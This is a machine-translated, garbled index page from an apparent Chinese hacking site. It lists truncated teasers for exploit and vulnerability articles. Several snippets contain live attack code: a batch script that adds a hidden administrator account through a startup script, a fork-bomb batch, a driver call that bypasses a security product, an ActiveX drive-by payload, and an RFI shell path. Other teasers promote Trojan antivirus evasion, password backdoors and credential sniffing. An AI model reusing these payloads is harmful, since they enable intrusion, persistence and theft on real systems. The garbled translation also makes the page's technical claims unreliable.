Script to automatically create the account password script to automatically create an account password-loophole warning-the black bar safety net

@echo off net user lanye lanye /add net user localgroup administrators lanye /add It is actually very simple! Here's the@echo off you can write you can not write． Action is prompt. The above code is saved as the ＢＡＴ file after that put in C:\windows\system32\GroupPolicy\Machine\Scripts\Startup th...

Detailed WINRAR self-extracting cross-site attack vulnerabilities-vulnerability warning-the black bar safety net

Listen to many people say WINRAR self-extracting format of the file in the installation interface can be cross-site, the author personally tested, this not alone that is across Station, originally thought it was a new out of the vulnerability of it, the original is WINRAR itself defects, in which...

Analysis upload vulnerability-vulnerability warning-the black bar safety net

In a brief introduction through the injection vulnerability check and fill, following the coupling re-introduce a vulnerability--upload vulnerability, which is a ratio to inject more lethal vulnerability. By injecting the resultant is often a database of some sensitive information such as...

Protection anti is Protection error--Taoyuan disk new vulnerability-vulnerability warning-the black bar safety net

Recently I took up the study of“Taoyuan Network Hard security”related tasks. The following operation is the latest of the“Taoyuan Network Hard Disk V3. 1 Personal Edition free version”, so the following is the analysis of vulnerability is possible only for the above version is useful, but the...

BBSXP the latest vulnerability and the discovery process-vulnerability warning-the black bar safety net

Operating environment: Micromedia Dreamweaver 8.0+IIS 5.0+SQL Server 2 0 0 0+BBSXP 6.00 SP1 SQL Travel back to the days of work relatively easily, just as everyone presented a few days ago found BBSXP new vulnerability, the way to find the ASP program vulnerability method. See here you should thi...

The use of IIS maximum number of connections to test site bandwidth-vulnerability warning-the black bar safety net

This program only as technical exchanges, not for illegal purposes! Recently bought a space to play, you do not laugh, is the entry level of the virtual host, coupling is poor?, the various parameters are quite low, particularly IIS the number of connections, only 1 0 0, that is, at the same time...

Bole asp receiving program vulnerabilities and the use of the program-vulnerability warning-the black bar safety net

Horses receiving the programfor the previous old version. Later patched this vulnerability Primary database name using the first set is random generated..but because he is the Universal addressee of the program..can be intercepted Secret security.. mibao. asp file to the submitted parameters...

The decomposition of the back door to check the heart-to build antivirus PASS Backdoor-vulnerability warning-the black bar safety net

In the security concept of growing today, want to get a station of their own chickens is easy, if say because the administrator found himself left in the broiler on the back door account and lead to broiler missing words, that is the world the most painful thing, I believe everyone will not want...

Brk vulnerability analysis and remediation-vulnerability and early warning-the black bar safety net

Brk vulnerability analysis and patching brk vulnerability analysis A little out of date music at: I hope everyone also can be a little. Brk vulnerability analysis by icbm@0x557 1. brk loopholes in the background 2. The vulnerability principle analysis 3. Exploit analysis 4. The vulnerability is...

Talking about the Web App secondary vulnerability-vulnerability warning-the black bar safety net

On the assumption that design does not exist on the problems that people solve an application problem does not exist, and the use of language, and other peripheral component is a secure case, the program of the vulnerability on most of is due to in the implementation process, the programmer for t...

Quickly recover Word, Excel password-vulnerability warning-the black bar safety net

I give a important Word file plus a password, for security settings was more complex, did not think the time of use Forgot Password, but put your own barrier to the outside. Have to unlock a good way? Rushed to action: you can use Office Password Remover to save in a hurry. Download this green...

The Flash vulnerability used in shellcode analysis-vulnerability warning-the black bar safety net

Title: 【original】flash vulnerability used in shellcode analysis Author: Regulus small Cong Time: 2008-06-02,1 9:2 9 Links: http://bbs.pediy.com/showthread.php?t=65907 Author home page: http://hi.baidu.com/yicong2007 The purpose: purely to learn, do not for malicious purposes In recent days flash...

2 0 0 8 all the active Defense of ideas-vulnerability warning-the black bar safety net

| Hello everyone, I'm a sailor, and talked about soft kill active Defense, but this year a hot topic, mostly what modify time is too Kabbah take the initiative and restore SSDT table topics like, now to modify the time through the Kabbah take the initiative on the new version of the card bar has ...

Joomla Exploiter-exploit warning-the black bar safety net

Author:Casi An old tool that was private way back, now public, the tool scans a Joomla site for a list of possible RFI exploits by including a text file below very very quickly, enjoy! txt.txt Code: List.txt ./ comdirectory/modules/modpxtlatest. php? GLOBALSmosConfigabsolutepath=$shell ./...

About phpwind cloning user-bug warning-the black bar safety net

Author: lcx Source: vbs small shop First, the character set of the 1 7 4 Go,wscript. echo "%"&CStrHexascbchrb1 7 4,The url-encoded result is%AE. Of course you use other character sets in the 129-255 of can also, I With is 1 7 4 of. Then with achilles（Ann coke there are, modify post data,in the us...

Teach you clever with a text editor find system vulnerabilities-vulnerability warning-the black bar safety net

Although Kaspersky, rising and other security software can help us to find the vulnerabilities, but today the editor to introduce a method to find loopholes in the new method: use a hexadecimal editor to find the vulnerability. A hex Editor can be used to check and repair various files, recover...

flashblog remote file upload vulnerability-vulnerability warning-the black bar safety net

From: mefistoathackermail.com Date: 2 0 0 8 year 5 month 2 9 day 6 When 5 7 minutes 2 1 seconds-0 0 0 0 The 'binary'encoding is not supported, stored as-is flashblog beta0. 3 1 Remote File Upload vulnerability Author : MEFISTO---- mefisto |at |hackermail |dot| com of author: mefisto---- mefisto...

phpwind management permission to disclose the exploit program PHP Edition-vulnerability warning-the black bar safety net

Ghost boy: yesterday made phpwind management authority disclosure vulnerability+exploit program, use the program is written in python, many of my friends say not available, see today yuehei school left a message saying he rewritten into PHP. Author: yuehei Source: yuehei between two points Always...

the flash vulnerability used in shellcode analysis-vulnerability warning-the black bar safety net

Title: 【original】flash vulnerability used in shellcode analysis Author: Regulus small Cong Time: 2008-06-02,1 9:2 9 Links: http://bbs.pediy.com/showthread.php?t=65907 Author home page: http://hi.baidu.com/yicong2007 The purpose: purely to learn, do not for malicious purposes In recent days flash...

FLASH 0DAY Shellcode position with the Builder-vulnerability warning-the black bar safety net

Author: open Source: open’s Blog The first say. Even? have a look at the other version. I only I caught after the proposed version, for example. The other version I know nothing about. See comment a dear friend made a question of time. Yes. This version has real time verification problem. However...

SHOPXP Mall hack method-vulnerability warning-the black bar safety net

In the ASP source code,SHOPXP Mall do is quite good,many users are very want to get SHOPXP the full version or cracked version,but regardless of is the official download still BAIDU the resulting,so-called full version to always have a wide variety of limit,online the more famous is theshopxp7...

Dvbbs8. 2 access/sql version of the login. asp remote sql injection vulnerability-vulnerability warning-the black bar safety net

by [email protected] Vulnerability description: Chinese is the most widely used Forum app, the latest dvbbs8. 2 injection vulnerability 0day including the official version, including access and sql versions. The vulnerability exists on the source application login. asp Login. the asp program i...

VMware Server Console ActiveX DOS POC-exploit warning-the black bar safety net

XML/HTML code 1. html 2. titleVMware Server Console ActiveX DOS POC/title 3. !-- 4. Author:Shennan Wang 5. blog:http://hi. baidu. com/nansec 6. stuff:http://www. d4rkn3t. cn 7. thanks: 8. Robinh00d,ayarei,void 9. -- 1 0. head 1 1. script language="JavaScript" 1 2. function test 1 3. var bufA =...

FLASH 0DAY detailed analysis and summary!- Vulnerability warning-the black bar safety net

By: the racle Notes: ------------------------------------------ First must thank X. G. C. Team OPEN in a few key places to give my analysis,solution help. And we Forum several brothers to help. In the end, I only put this stuff to analyze it.. ------------------------------------------ The recent...

Use sohu site URL jump loopholes to deceive the mailbox password-vulnerability warning-the black bar safety net

Author: emptiness prodigal heartXGC url jump vulnerability all over the major web site, simple look, THE9, sohu, etc. actually there are This loophole is! We take sohu, for example, talk about the vulnerability. Come to sohu, the user registration page, you can see that in the IE address bar, the...

Think of a use webshell to run the system password of the way-vulnerability warning-the black bar safety net

Haiyang the webshell has a switch is to control what logged in webshell. Assumed to have been the target of the webshell, and collected some of the password, and the target has no ftp, mssql like the port is open, then we can be used to run the system password, try luck. Specific: Modify...

flash a tips-vulnerability warning-the black bar safety net

Author: darkne2s Source: energy Temple It seems like a large cattle these all have flash exp. But 1 0 personal 9 personal that bad. This surprised me. Press the truth to say that this is not the person's vulnerability should be very easy to use. And I also often irregularly collected all over the...

F2blog XMLRPC to upload arbitrary file vulnerability-vulnerability warning-the black bar safety net

By: the Maple-xB. C. T Site:http://www.neeao.com Date:2008-5-27 Just from the official download of the latest version: F2blog-v1. 2build03. 01full There is vulnerability file: xmlrpc.php that Effect: you can upload any file to the server. Principle: gethttprawpostdatais to obtain the most origina...

FLASH net horse quietly coming out of the Internet-vulnerability warning-the black bar safety net

ps:it is recommended that everyone upgrade as soon as possible flash plug-in. In recent days the interception to the use of the Adobe Flash Player SWF file vulnerability network horses, the net horse through the page loading a normal FLASH file, then in the FLASH file calls the embedded construct...

eWebEditorNet vulnerability demo[0Day]-vulnerability warning-the black bar safety net

Reproduced please retain the copyright information PopSky 'S Blog When the access eWebEditorNet/Upload. aspx,you can see only browse,missing the Upload button.... ! But that's OK,in the choose the good we want to upload the Trojan later,directly in IE which input javascript:lbtnUpload. click;retu...

Line of code are not written, penetrating the Jinshan Islands-vulnerability warning-the black bar safety net

Kingsoft files security the island will put the file to protect COPY to My Document\Kingsoft security Island\documents When you want to access the directory of the file, it will prompt reject Penetration method,直接 运行 cmd.exeI'm the My Document directory in the D disk root directory d: d:\cd MYDOC...

Two lines of code to bypass the home patrol v1. 1-vulnerability warning-the black bar safety net

HANDLE hdev = CreateFile"\\\\.\\ IEGuard" , FILEREADATTRIBUTES , 0 , 0, OPENEXISTING , 0 , 0 ; DeviceIoControlhdev , 0x50000408 , 0 , 0 , 0 , 0 , &retlen , 0 ; ! Demo program download: http://www.debugman.com/read.php?tid=1306&page=ea （IDB） Or: Under the \漏洞 演示 \BypassIeGuard.rar...

Through the NOD of memory why so trouble-vulnerability warning-the black bar safety net

You want to move the hard drive inside the aio to elsewhere, always to NOD32 kill, depressing the ball. Is there any method to go around? The method is, of course, the key to see you have no creativity, hehe. nod32 virus scanning before will first look at the file suffix is not an executable file...

Use IAT hook to achieve universal windows password Backdoor-vulnerability warning-the black bar safety net

Author: clyfish windows has a generic password? Go ask bill uncle. The first matter is not really there, we can implement such a backdoor. Briefly explain the windows login process in some process. the winlogon process with gina. dll to obtain a user name and password, through the LPC passed to t...

Share Trojan-free kill technology experience-vulnerability warning-the black bar safety net

Trojan horsefree kill,in the country should originate in the 0 to 5 years. From then on a single feature of the code is now a composite signature,antivirus software from Active defense to Active Defense. Free to killtechnology is increasingly difficult. But plus ça change--change the feature code...

CSRF: don't underestimate my damage and ability to attack-vulnerability warning-the black bar safety net

Author: iceskysl Source: IceskYsl@1sters! CSRF, this attack way, although proposed a long time in the 2 0 0 6 time of year there, but this sleepy attack the giants until recently only gradually into our line of sight, what is CSRF what is that harm in the end how much? Common use is the How to,...

Home patrol v1. 1/1. 0 kernel driver denial of service and local mention the right vulnerability-vulnerability warning-the black bar safety net

Author: MJ0011 Source: MJ0011 kernel driver Institute Home patrol v1. 1/1. 0 kernel driver there is a serious vulnerability Installed the home patrol v1. 1v1. 0the machines, any permissions the user can cause the system to blue screen BSOD, and cause a denial of service attack Combined with our...

For the Oracle TNS listener the attack methods of finishing-vulnerability warning-the black bar safety net

Author: poison/amxku Source: amxku’s blog First, depending on the version, the TNS listener may be more susceptible to a variety of types of buffer overflow attacks, these attacks can be in does not provide a user ID and password to be used. For example: in oracle 9i, when a client requests a lon...

Open a Nday MS08-0 1 0(CVE-2 0 0 8-0 0 7 6)-vulnerability warning-the black bar safety net

The recent IE holes in a large stack,record what I know: 1. MS08-0 1 0:In addition to the VFP control of at least the TP mentioned above is able to take advantage of. 2. MS08-0 2 2:script ENCODER processing on the hole,but I see you want to use is too difficult,the hints about the patch compariso...

MyPhpAdmin execute the attacker's code vulnerability-vulnerability warning-the black bar safety net

Relates to the program: myPhpAdmin Description: myPhpAdmin execute the attacker's arbitrary code exploit analysis Details: myPhpAdmin is a can through the network to the MySQL database to the control software. But found that it the vulnerability exists in the script 'tblcopy.php' and...

A word to make OBLOG user password obediently sent on-vulnerability warning-the black bar safety net

As network technology gradually developed, more and more enterprises have their own website platform, through this platform, external publicity yourself, and the content so employees can better communicate technical issues and working arrangements. OBLOG as a multi-user blog publishing system in ...

Sniffpass easily monitor the LAN password-vulnerability warning-the black bar safety net

Local area network because of its specificity, caused by the data is easy to be sniffing. Of course, most of the administrators have not implemented stream encryption to work, the plaintext password in the LAN can“see light die”. sniffpass is such a sniffing tool. Run the program after clicking...

From the flowers began to scold kill free-vulnerability warning-the black bar safety net

The topic you read that right, and indeed from the flower began to scoldfree kill. Why you want to scold it, in fact because of recent school bored, so using a mobile phone on the QQ scurry. Not is I which nerve dislocation, is looking for a to teachfree killchat updon't ask me how I make him tal...

Debian disaster-vulnerability warning-the black bar safety net

by axis 2008-05-16 http://www.ph4nt0m.org The Debian OpenSSL package the algorithms have problems, random number generation is actually in the process pid in the selection, lead to the generation of key can be exhaustive The following extract from the metasploit blog The Bug On May 13th, 2 0 0 8...

Aviv Raff of IE0day, published-vulnerability warning-the black bar safety net

MS Internet Explorer "Print Table of Links" Cross-Zone Scripting Vulnerability Specific details: If you enable the "Print Table of Links", in printing a web page, it is possible to cause the execution of arbitrary code, and of course VISTA UAC may block it : Reproduce: 1. Below this place on the...

Light into the light out of the Liunx Shellcode-exploit warning-the black bar safety net

/------------- Author:merry-go-round of wood the B. C. T [email protected] Date:2008/05/12 Website:www.bugshower.org -------------/ A: What is shellcode Saying one day some Patriotic hackers compiled a Nday overflow exploit program to attack the CNN, the input IP and enter after the discovery of...

Linux system how to view and modify the file read and write permissions-bug warning-the black bar safety net

View file permissions statement: In the terminal enter: ls-l xxx. xxx （xxx. xxx is the file name Then there will be similar information, mainly these: -rw-rw-r-- A total of 1 0 bit number Including: top that - represent the type The middle of that three rw - represent the owner（user） And then tha...

Net horse Central-vulnerability warning-the black bar safety net

Author: cosine Source: 0×3 7 Security Actually think about it know, network the horse of exp there will always be Exposure time, that is, my system environment as long as meet the conditions can get this net horse exp. By combining the services side of the technical means, we can hide the network...

Various invasion of the batch-a vulnerability warning-the black bar safety net

First:let others memory OVERforce him to restart @echo off start cmd %0 On this 3 lines. Second:let the other party to restart the specified number of timesvictim-specific @echo off if not exist c:\1.txt echo. c:\1.txt & goto err1 if not exist c:\2.txt echo. c:\2.txt & goto err1 if not exist...

With all the 0day,the current through the kill all versions-bug warning-the black bar safety net

Program code SCRIPTwindow. onerror=functionreturn true;/SCRIPT SCRIPT document. writeln"object classid="clsid:61F5C358-60FB-4A23-A312 - D2B556620F20" style='display:none' id='Kazakh'/object"; document. writeln"SCRIPT language="javascript""; document. writeln"var...